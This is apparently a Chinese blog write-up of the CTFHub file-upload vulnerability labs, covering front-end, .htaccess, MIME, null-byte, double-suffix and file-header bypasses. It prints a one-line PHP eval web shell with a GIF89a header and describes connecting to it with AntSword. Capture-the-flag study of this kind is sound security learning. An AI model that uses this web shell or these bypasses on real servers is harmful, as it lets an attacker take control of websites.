CTFHUB 文件上传漏洞

文件上传

定义:文件上传漏洞是web系统中常见的一种功能,通过文件上传能实现上传图片、视频,以及其他类型的文件,但是随着web中包含的功能越来越多,潜在的网络安全风险也就越大。如果恶意用户上传了可执行的文件或者脚本,就会导致网站被其控制甚至会使其服务器沦陷,以至于引发恶意的网络安全事件。一般是因为站点开放了文件上传功能,但却对上传的文件没有进行足够的限制。程序开发部署时,没有考虑到系统特性、过滤不严格。站点服务器存在解析漏洞,被黑客利用后导致可以上传任意文件。

原理:文件上传漏洞是指用户通过界面上的上传功能上传了一个可执行的脚本文件,而WEB端的系统并未对其进行检测或者检测的逻辑做的不够好。通过来说文件上传功能是没有问题的,主要是服务器如何对上传的文件如何进行处理。若WEB未对用户上传的文件进行有效的审查,若存在恶意用户对其上传一句话木马,从而实现控制WEB网站的目的。

分类:前端验证、.htaccess、MIME绕过、00截断、双写后缀、文件头检查

例题:CTFHUB

无验证

先打开环境,它提示无验证,直接上传一句话木马

GIF89a

<?php @eval($_POST['123']);?>

使用蚁剑连接,添加路径密码,测试连接,然后添加,在他的目录里得到flag

前端验证

打开环境,我们先上传一句话木马试试看,他不允许上传此类文件,提示JS前端验证,新建一个新网页输入 about:config,接受风险,然后搜索javascript.enabled,将它改为false

然后上传一句话木马文件

输入路径,密码,测试连接,添加,在目录里找到flag

.htaccess

htaccess文件是Apache服务器中的一个配置文件,它负责相关目录下的网页配置。通过htaccess文件,可以帮我们实现:网页301重定向、自定义404错误页面、改变文件扩展名、允许/阻止特定的用户或者目录的访问、禁止目录列表、配置默认文档等功能

打开环境,上传一个.htaccess文件(AddType application/x-httpd-php .jpg(将所有jpg文件视为php文件来解析)),再上传一个一句话木马的jpg文件,用蚁剑连接得到flag

MIME绕过

MIME多用途互联网邮件扩展类型。是设定某种扩展名的文件用一种应用程序来打开的方式类型,当该扩展名文件被访问的时候,浏览器会自动使用指定应用程序来打开。多用于指定一些客户端自定义的文件名,以及一些媒体文件打开方式.

打开环境,提示了MIME绕过,上传一句话木马文件,BP抓包,修改Content-Type内容为image/jpg,放包上传成功,用蚁剑连接得到flag

00截断

00截断的原理,就是利用0x00是字符串的结束标识符,攻击者可以利用手动添加字符串标识符的方式来将后面的内容进行截断,而后面的内容又可以帮助我们绕过检测。 需要注意的是,0x00截断是16进制的截断,需要修改16进制的数据头,如果使用burp,就要在Hex中对数据进行改写。

打开环境题目提示00截断,上传一句话木马文件,BP抓包,修改文件名为1.php%00.jpg(两处都要修改),发送到重发器里,看到有响应,放包,使用蚁剑连接(修改路径),得到flag

双写后缀

打开环境,上传一句话木马,BP抓包,发送到重发器里,发现它把php过滤了,修改文件名为1.pphphp,放包之后使用蚁剑连接得到flag

文件头检查

先上传一句话木马的php文件,它提示只能上传jpg等文件类型,那就上传一句话木马的jpg文件,然后BP抓包,修改文件名(1.jpg改为1.php)放包,发现上传成功,蚁剑连接得到flag

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值